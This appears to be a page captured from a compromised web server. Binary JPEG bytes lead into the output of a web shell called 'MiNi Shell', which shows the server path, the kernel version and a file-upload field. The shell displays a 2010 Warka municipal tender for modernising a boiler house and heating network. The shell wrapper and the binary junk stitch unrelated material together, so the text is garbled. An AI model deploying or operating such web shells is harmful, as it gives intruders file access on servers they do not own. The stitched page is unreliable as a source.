JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100601/153118-N-2010.html

<p class="kh_header"><b>Warka: Wykonanie projektu przebudowy (modernizacji) kotłowni oraz sieci ciepłowniczej z węzłami na osiedlu 35-lecia PRL i osiedlu Książąt Mazowieckich w Warce</b><br>
<b>Numer ogłoszenia: 153118 - 2010; data zamieszczenia: 01.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Warka , Plac St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, tel. 048 665 12 00, faks 048 665 12 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu przebudowy (modernizacji) kotłowni oraz sieci ciepłowniczej z węzłami na osiedlu 35-lecia PRL i osiedlu Książąt Mazowieckich w Warce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
Przedmiotem zamówienia jest wykonanie Projektu budowlanego przebudowy (modernizacji) kotłowni oraz sieci ciepłowniczej z węzłami cieplnymi na osiedlu 35-lecia PRL i osiedlu Książąt Mazowieckich w Warce.

I. Informacje ogólne
1.	Projekt powinien być opracowany zgodnie z:
	Ustawą z dnia 7 lipca 1994r - Prawo budowlane (tekst jednolity Dz.U z 2006r Nr 156, poz. 1118, z późniejszymi zmianami),
	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202 z 2004 r., poz.2072, z późniejszymi zmianami),
	Decyzją o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia - załącznik nr 8 do SIWZ
	Decyzją o ustaleniu lokalizacji inwestycji celu publicznego (w trakcie opracowania) oraz wg: Koncepcji przebudowy (modernizacji) kotłowni oraz sieci ciepłowniczej z węzłami cieplnymi na osiedlach 35-lecia i Książąt Mazowieckich w Warce - opracowaną przez firmę BISTYP-TECH Sp. z o.o. - Warszawa, sierpień 2008r. - załącznik nr 7 do SIWZ
2.	Projekt należy wykonać w dwóch etapach:
a)	etap pierwszy - projekt budowlany, 
-      w skład projektu budowlanego wchodzić będzie kompletna dokumentacja wielobranżowa ze
       wszystkimi uzgodnieniami, a także opracowanie kosztorysu wstępnego.
-      Wykonawca dostarczy kompletną dokumentację techniczną w wersji papierowej w 6 egz. oraz 
        w wersji elektronicznej w plikach PDF na CD, wstępny kosztorys szacunkowy w wersji papierowej 
        w 3 egz. oraz w wersji elektronicznej w plikach PDF na CD.
-      Projekt powinien spełniać standardy jakościowe wykonania, aby mógł być podstawą ubiegania
        się przez Zamawiającego lub Gminę Warka o dofinansowanie inwestycji z Funduszy krajowych 
        lub europejskich oraz uzyskania prawomocnej decyzji o pozwoleniu na budowę.
b)	etap drugi - projekt wykonawczy,
-      Uszczegółowienie projektu budowlanego,
-      Opracowanie kosztorysów inwestorskich i przedmiarów robót, kosztorysów ślepych, specyfikacji 
       technicznych wykonania i odbioru robót objętych przedmiotem zamówienia oraz opracowanie 
       niezbędnych instrukcji obsługi urządzeń.
-      Wykonawca dostarczy kompletną dokumentację techniczną w wersji papierowej w 6 egz. oraz w 
       wersji elektronicznej na CD w plikach PDF, oraz Komplet specyfikacji technicznych wykonania 
       i odbioru w wersji papierowej 3 egz. oraz w wersji elektronicznej w plikach PDF na CD.
       Przedmiary robót oraz kosztorysy ślepe w wersji papierowej 1 egz. oraz w wersji elektronicznej 
       w plikach PDF i .kst (Norma, Norma Pro) na CD. Kosztorysy inwestorskie w wersji papierowej 
       1 egz. oraz w wersji elektronicznej w plikach PDF na CD. Kosztorysy i przedmiary w rozbiciu na 
       poszczególne branze oraz obiekty z uwzględnieniem podziału kompetencji dostawcy i odbiorcy 
       ciepła.


II. Szczegółowy opis przedmiotu zamówienia
1.	Dokumentacja projektowa przebudowy (modernizacji) kotłowni oraz sieci ciepłowniczej z węzłami cieplnymi ma uwzględniać w szczególności:
a)	Rozwiązanie technologii kotłowni w istniejącym na os. 35-lecia 9 budynku Nr 2 z uwzględnieniem następujących zagadnień:
	parametry pracy kotłowni 120/80oC, moc kotłowni ok. 8,2 MW,
	zastosowanie nowoczesnych, sprawnych i markowych kotłów gazowych,
	optymalizacja pracy kotłów w okresie sezonu grzewczego i poza sezonem,
	przeprowadzenie wszelkich niezbędnych obliczeń cieplnych,
	podanie zestawienia podstawowych urządzeń (w tym emitorów),
	modernizacja budowlana obiektu kotłowni (wymiana drzwi i okien, wymiana instalacji wodociągowej, kanalizacyjnej i elektrycznej, naprawa elewacji),
	wykonanie schematów ideowych z opisami oraz rysunków budowlanych-montażowych kotłowni.
b)	Rozwiązanie węzłów cieplnych dla c.o. + c.w.u. (lub w miarę potrzeb tylko c.o. lub tylko c.w.u) z wymiennikami płytowymi, z uwzględnieniem następujących zagadnień:
	zastosowanie nowoczesnych wymienników i markowej armatury o dużej niezawodności,
	przeprowadzenie wszelkich niezbędnych obliczeń cieplnych dla poszczególnych punktów odbioru ciepła,
	wyraźny podział kompetencji technicznych dot. dostawcy ciepła (ZUK) i odbiorców ciepła (np. Spółdzielnia Mieszkaniowa, Wspólnoty Mieszkaniowe, itp.): 
	w gestii dostawcy ciepła - sieć cieplna, wymienniki, urządzenia w węźle związane z siecią, ciepłomierz, regulator pogodowy,
	w gestii odbiorcy ciepła - pozostałe urządzenia na instalacjach wewnętrznych.
	podanie zestawienia podstawowych urządzeń i armatury,
	wykonanie schematów ideowych z opisami oraz rysunków budowlanych każdego typu węzła.
c)	Rozwiązanie techniczne sieci ciepłowniczej, z uwzględnieniem następujących zagadnień: 
	sieć dwuprzewodowa z rur stalowych bez szwu preizolowanych,
	obliczenia i sprawdzenie doboru średnic i materiałów wg Koncepcji,
	przebieg sieci wg Koncepcji, na mapach do celów projektowych w skali 1:500,
	sygnalizacja awarii,
	szczegółowa specyfikacja rurociągów z długościami,
	obliczenie strat ciepła w sieci.
d)	Rozwiązanie monitorowania węzłów (dot. tylko węzłów w budynkach wielorodzinnych), przesył danych bezprzewodowo radio, z uwzględnieniem następujących zagadnień:
	możliwość odczytu na monitorze komputera w biurze dostawcy ciepła następujących parametrów pracy węzła: 
	suma dostarczonego ciepła w GJ,
	temperatura zasilania i powrotu,
	pobierana moc chwilowa,
	pobrana moc szczytowa w zdefiniowanym okresie,
	temperatura zasilania i powrotu mediów wtórnych (na instalacjach wewnętrznych u odbiorcy),
	różnica ciśnień na zasilaniu i powrocie,
	sygnalizacja przekroczeń zdefiniowanych parametrów na monitorze komputera w biurze dostawcy ciepła,
	możliwość tworzenia protokołów pracy węzłów i wykresów w zdefiniowanym okresie,
e)	Określenie w kosztorysach kosztów inwestycji z wyszczególnieniem poszczególnych części:
	źródło ciepła,
	węzły cieplne w rozbiciu na zakres kompetencji:
	Dostawca ciepła (Z.U.K. Warka),
	Odbiorcy ciepła,
	sieć cieplna,
	system monitoringu. 
2.	Wymaganiem Zamawiającego jest, aby zaproponowane w projekcie rozwiązania techniczne i technologiczne były zgodne z najlepszą praktyką i doświadczeniem, a zastosowane materiały i urządzenia były wysokiej jakości, zapewniającej długą, ekonomiczną i pewną eksploatację: 
3.	Projekt należy wykonać na aktualnych mapach do celów projektowych. Mapy do celów projektowych zapewni Zamawiający.
4.	Wykonawca powinien przeprowadzić wizję lokalną i zapoznać się z terenem w celu przeprowadzenia prawidłowej analizy przewidzianych prac projektowych, oceny zakresu i ilości tych prac - Zamawiający nie pokrywa kosztów z tym związanych. 
5.	Projekt będzie wykonany przez projektantów posiadających odpowiednie uprawnienia zawodowe, o których mowa w art. 13, ust. 1, pkt 1) i w art. 14, ust. 1, pkt 4) ustawy z dnia 07.07.1994r. - Prawo Budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156, poz. 1118), a także należących do stosownych izb samorządu zawodowego i płacących odpowiednie składki.
6.	W szczególności projekt budowlany powinien zostać opracowany w wersji papierowej obejmującej branże:
a)	Instalacyjną (sieć ciepłownicza wraz z zagospodarowaniem terenu i częścią budowlaną) - 6 egz.
b)	elektryczną - 6 egz.
7.	W szczególności projekt wykonawczy powinien zostać opracowany w wersji papierowej obejmującej branże:
c)	Instalacyjną (sieć ciepłownicza wraz z zagospodarowaniem terenu i częścią budowlaną) - 6 egz.
d)	elektryczną - 6 egz.
e)	zbiór specyfikacji technicznych wykonania i odbioru robót objętych przedmiotem zamówienia - 3 egz. 
f)	kosztorysy inwestorskie, kosztorysy ślepe i przedmiary robót w rozbiciu na branże oraz zagadnienia (kotłownia, sieć, węzły, monitoring) - wg pkt I. 2.b
g)	Instrukcje - 3 egz. w wersji papierowej
8.	Projekt, Specyfikacje techniczne wykonania i odbioru robót budowlanych muszą być także przekazane Zamawiającemu w wersji elektronicznej w plikach .pdf (na CD) w etapie pierwszym, przedmiary robót, kosztorysy ślepe i inwestorskie w plikach .kst (Norma Pro), a Instrukcje w plikach .doc(x) i pdf  w etapie drugim.
9.	Na każdym etapie projektowania będzie wymagane zachowanie ścisłego kontaktu z Zamawiającym i dokonanie pisemnych uzgodnień zakresu prac projektowych. Przed przystąpieniem do uzgodnienia ZUD niezbędne będzie potwierdzenie na piśmie akceptacji projektu ze strony Zamawiającego.
10.	Po wykonaniu przez Wykonawcę przedmiotu zamówienia Zamawiający wystąpi z wnioskiem do Starosty Grójeckiego o zatwierdzenie opracowanego projektu i uzyskanie pozwolenia na budowę.
11.	Oczekiwany termin wykonania kompletnej dokumentacji budowlanej - etap pierwszy ustala się do 16.07.2010r. Termin wykonania dokumentacji wykonawczej - etap drugi ustala się do 16.08.2010r.
12.	Termin pełnienia nadzoru autorskiego w ilości pięciu pobytów projektantów wszystkich branż na budowie, ustala się do czasu zakończenia inwestycji przez Zamawiającego (uzyskania decyzji na użytkowanie całego zakresu projektu). Dodatkowe nadzory autorskie będą zlecone odrębną umową. 
13.	Termin przekazania przez Zamawiającego aktualnych map do celów projektowych ustala się na 5 dni od daty podpisania umowy.
14.	Zamawiający nie posiada badań geologicznych terenu - w razie konieczności zapewnia je projektant.
15.	Ewentualne dodatkowe rzędne terenu pozyskuje we własnym zakresie i na własny koszt Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Opracowanie kompletnych projektów budowlanych  i wykonawczych w zakresie do 50 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium w wysokości:   7 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wymaganego dokumentu określonego w punkcie III.4.2) uprawniającego do prowadzenia działalności w zakresie niezbędnym i uprawniającym do realizacji zamówienia - wg kryterium:  spełnia ,  nie spełnia . Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie doświadczenia zawodowego w zakresie opracowania projektów budowlanych odpowiadających swoim rodzajem i wartością opracowaniom stanowiącym przedmiot zamówienia. 
Wykonawca przedstawi dokumenty świadczące o tym, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum jedną pracę projektową porównywalną z zakresem przedmiotu zamówienia tj. projekt budowy, przebudowy lub rozbudowy kotłowni gazowej lub kotłowni wraz z siecią ciepłowniczą o wartości prac projektowych nie mniejszej niż 200.000 zł brutto. 
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonych dokumentów wymaganych i określonych w punkcie III.4.1)  -  wg kryterium: spełnia, nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami odpowiedzialnymi za wykonanie zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób wykwalifikowanych, zdolnych do wykonania zamówienia, posiadających uprawnienia projektowe bez ograniczeń, upoważniające w świetle obowiązujących przepisów do projektowania i sprawdzania projektów  w zakresie  specjalności będącej przedmiotem zamówienia oraz posiadających aktualny wpis na listę członków właściwej izby samorządu zawodowego wydany przez tę izbę.
Wymagane osoby to: 
	projektant branży konstrukcyjno-budowlanej, instalacji sanitarnych (wodnych, kanalizacyjnych, c.o., i gazowych), instalacji elektrycznych  oraz sprawdzający w w/w branżach posiadających odpowiednie uprawnienia zawodowe bez ograniczeń oraz co najmniej 2 lata doświadczenia w pracach projektowych po uzyskaniu uprawnień zawodowych do samodzielnego wykonywania funkcji.

 Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonych, wymaganych dokumentów, określonych w punkcie III.4.1) - wg kryterium: spełnia, nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Upoważnienie potwierdzające uprawnienie osób podpisujących ofertę (pełnomocnictwo), o ile nie wynika ono z przepisów prawa lub innych dokumentów rejestrowych.
2)	Oświadczenie dot. spełniania warunków udziału w postępowaniu - załącznik nr 4 do SIWZ
3)	Formularz oferty wg wzoru - Załącznik nr 1  do SIWZ.
4)	Formularz cenowy wg wzoru - Załącznik nr 1A do SIWZ
5)	Dowód wniesienia/wpłacenia wadium.
6)	Oświadczenie Wykonawcy o wskazaniu części zamówienia, której wykonanie powierzy podwykonawcom wg Załącznika nr 6 do SIWZ
7)	W przypadku składania oferty przez konsorcjum, niezbędne będzie złożenie pełnomocnictwa w oryginale lub kopii poświadczonej przez notariusza
Uwaga: dokumenty żądane przez Zamawiającego, o których mowa w p.pkt 1) i 5) mogą być kserokopią potwierdzoną przez Wykonawcę za zgodność z oryginałem</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.warka.pl/zp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Warce, pl.St. Czarnieckiego 1,05-660 Warka, mazowieckie, w godzinach pracy Urzędu,do upływu terminu składania ofert(wer. papierowa-cena siwz 100zł)-informacja w BIURZE OBSŁUGI (parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2010 godzina 12:00, miejsce: Urząd Miejski w Warce, Pl. Stefana Czarnieckiego 1, 05-660 Warka  w BIURZE OBSŁUGI (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com